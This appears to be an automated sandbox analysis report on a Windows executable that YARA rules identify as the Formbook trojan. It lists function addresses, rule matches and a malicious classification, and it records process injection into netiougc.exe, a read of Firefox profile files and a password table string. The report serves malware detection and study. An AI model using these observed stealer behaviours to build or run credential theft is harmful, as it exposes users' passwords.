            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015803E62_2_015803E6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015602742_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015402C02_2_015402C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C05352_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015805912_2_01580591
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015724462_2_01572446
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015644202_2_01564420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156E4F62_2_0156E4F6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E47502_2_014E4750
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C07702_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BC7C02_2_014BC7C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DC6E02_2_014DC6E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D69622_2_014D6962
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A02_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0158A9A62_2_0158A9A6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CA8402_2_014CA840
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C28402_2_014C2840
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE8F02_2_014EE8F0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A68B82_2_014A68B8
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157AB402_2_0157AB40
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01576BD72_2_01576BD7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BEA802_2_014BEA80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155CD1F2_2_0155CD1F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CAD002_2_014CAD00
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BADE02_2_014BADE0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D8DBF2_2_014D8DBF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0C002_2_014C0C00
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0CF22_2_014B0CF2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560CB52_2_01560CB5
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01534F402_2_01534F40
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01562F302_2_01562F30
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01502F282_2_01502F28
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E0F302_2_014E0F30
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B2FC82_2_014B2FC8
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153EFA02_2_0153EFA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0E592_2_014C0E59
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157EE262_2_0157EE26
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157EEDB2_2_0157EEDB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157CE932_2_0157CE93
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D2E902_2_014D2E90
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F516C2_2_014F516C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0158B16B2_2_0158B16B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AF1722_2_014AF172
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CB1B02_2_014CB1B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C70C02_2_014C70C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156F0CC2_2_0156F0CC
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157F0E02_2_0157F0E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015770E92_2_015770E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AD34C2_2_014AD34C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157132D2_2_0157132D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0150739A2_2_0150739A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DB2C02_2_014DB2C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015612ED2_2_015612ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DD2F02_2_014DD2F0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C52A02_2_014C52A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015775712_2_01577571
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015895C32_2_015895C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155D5B02_2_0155D5B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B14602_2_014B1460
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157F43F2_2_0157F43F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157F7B02_2_0157F7B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015056302_2_01505630
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015716CC2_2_015716CC
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C99502_2_014C9950
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DB9502_2_014DB950
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015559102_2_01555910
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152D8002_2_0152D800
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C38E02_2_014C38E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157FB762_2_0157FB76
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01535BF02_2_01535BF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014FDBF92_2_014FDBF9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DFB802_2_014DFB80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01577A462_2_01577A46
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157FA492_2_0157FA49
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01533A6C2_2_01533A6C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156DAC62_2_0156DAC6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01505AA02_2_01505AA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01561AA32_2_01561AA3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155DAAC2_2_0155DAAC
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C3D402_2_014C3D40
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01571D5A2_2_01571D5A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01577D732_2_01577D73
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DFDC02_2_014DFDC0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01539C322_2_01539C32
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157FCF22_2_0157FCF2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157FF092_2_0157FF09
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C1F922_2_014C1F92
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157FFB12_2_0157FFB1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C9EB02_2_014C9EB0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AB03E67_2_03AB03E6
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039FE3F07_2_039FE3F0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAA3527_2_03AAA352
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A702C07_2_03A702C0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A902747_2_03A90274
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AB01AA7_2_03AB01AA
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA41A27_2_03AA41A2
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA81CC7_2_03AA81CC
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039E01007_2_039E0100
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A8A1187_2_03A8A118
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A781587_2_03A78158
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A820007_2_03A82000
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039EC7C07_2_039EC7C0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F07707_2_039F0770
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A147507_2_03A14750
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A0C6E07_2_03A0C6E0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AB05917_2_03AB0591
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F05357_2_039F0535
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A9E4F67_2_03A9E4F6
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A944207_2_03A94420
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA24467_2_03AA2446
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA6BD77_2_03AA6BD7
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAAB407_2_03AAAB40
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039EEA807_2_039EEA80
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03ABA9A67_2_03ABA9A6
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F29A07_2_039F29A0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A069627_2_03A06962
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039D68B87_2_039D68B8
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A1E8F07_2_03A1E8F0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F28407_2_039F2840
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039FA8407_2_039FA840
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A6EFA07_2_03A6EFA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039E2FC87_2_039E2FC8
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A32F287_2_03A32F28
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A10F307_2_03A10F30
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A92F307_2_03A92F30
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A64F407_2_03A64F40
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A02E907_2_03A02E90
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AACE937_2_03AACE93
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAEEDB7_2_03AAEEDB
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAEE267_2_03AAEE26
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F0E597_2_039F0E59
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A08DBF7_2_03A08DBF
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039EADE07_2_039EADE0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039FAD007_2_039FAD00
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A8CD1F7_2_03A8CD1F
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A90CB57_2_03A90CB5
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039E0CF27_2_039E0CF2
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F0C007_2_039F0C00
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A3739A7_2_03A3739A
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA132D7_2_03AA132D
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039DD34C7_2_039DD34C
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F52A07_2_039F52A0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A912ED7_2_03A912ED
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A0D2F07_2_03A0D2F0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A0B2C07_2_03A0B2C0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039FB1B07_2_039FB1B0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03ABB16B7_2_03ABB16B
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A2516C7_2_03A2516C
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039DF1727_2_039DF172
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA70E97_2_03AA70E9
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAF0E07_2_03AAF0E0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F70C07_2_039F70C0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A9F0CC7_2_03A9F0CC
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAF7B07_2_03AAF7B0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA16CC7_2_03AA16CC
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A356307_2_03A35630
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A8D5B07_2_03A8D5B0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA75717_2_03AA7571
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAF43F7_2_03AAF43F
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039E14607_2_039E1460
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A0FB807_2_03A0FB80
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A65BF07_2_03A65BF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A2DBF97_2_03A2DBF9
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAFB767_2_03AAFB76
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A35AA07_2_03A35AA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A8DAAC7_2_03A8DAAC
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A91AA37_2_03A91AA3
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A9DAC67_2_03A9DAC6
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A63A6C7_2_03A63A6C
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAFA497_2_03AAFA49
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA7A467_2_03AA7A46
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A859107_2_03A85910
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F99507_2_039F9950
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A0B9507_2_03A0B950
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F38E07_2_039F38E0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A5D8007_2_03A5D800
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F1F927_2_039F1F92
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAFFB17_2_03AAFFB1
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAFF097_2_03AAFF09
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F9EB07_2_039F9EB0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A0FDC07_2_03A0FDC0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA7D737_2_03AA7D73
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039F3D407_2_039F3D40
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AA1D5A7_2_03AA1D5A
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03AAFCF27_2_03AAFCF2
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A69C327_2_03A69C32
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_032219E07_2_032219E0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0323A5307_2_0323A530
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0321CBA07_2_0321CBA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0321AE407_2_0321AE40
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0321CDC07_2_0321CDC0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_032235307_2_03223530
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_038CA36B7_2_038CA36B
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_038CB0987_2_038CB098
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_038CC02C7_2_038CC02C
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_038CBB787_2_038CBB78
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_038CBC937_2_038CBC93
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: String function: 0153F290 appears 103 times
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: String function: 01507E54 appears 107 times
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: String function: 014AB970 appears 262 times
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: String function: 014F5130 appears 58 times
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: String function: 0152EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: String function: 03A6F290 appears 103 times
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: String function: 03A37E54 appears 107 times
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: String function: 039DB970 appears 262 times
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: String function: 03A25130 appears 58 times
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: String function: 03A5EA12 appears 86 times
            Source: indent PWS-020199.exeStatic PE information: invalid certificate
            Source: indent PWS-020199.exe, 00000000.00000002.1684583267.000000000B670000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000000.00000000.1660465288.00000000010A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWsRG.exe( vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000000.00000002.1680983268.00000000016BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000000.00000002.1684045855.0000000007A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000000.00000002.1681604026.0000000003451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetiougc.exej% vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000002.00000002.1974261923.00000000015AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs indent PWS-020199.exe
            Source: indent PWS-020199.exeBinary or memory string: OriginalFilenameWsRG.exe( vs indent PWS-020199.exe
            Source: indent PWS-020199.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: indent PWS-020199.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, aNGB1Sr6aGUuEYu12d.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/5
            Source: C:\Users\user\Desktop\indent PWS-020199.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\indent PWS-020199.exe.logJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\netiougc.exeFile created: C:\Users\user\AppData\Local\Temp\3e3-f82uJump to behavior
            Source: indent PWS-020199.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: indent PWS-020199.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netiougc.exe, 00000007.00000003.2203860120.0000000003387000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2904358299.0000000003387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
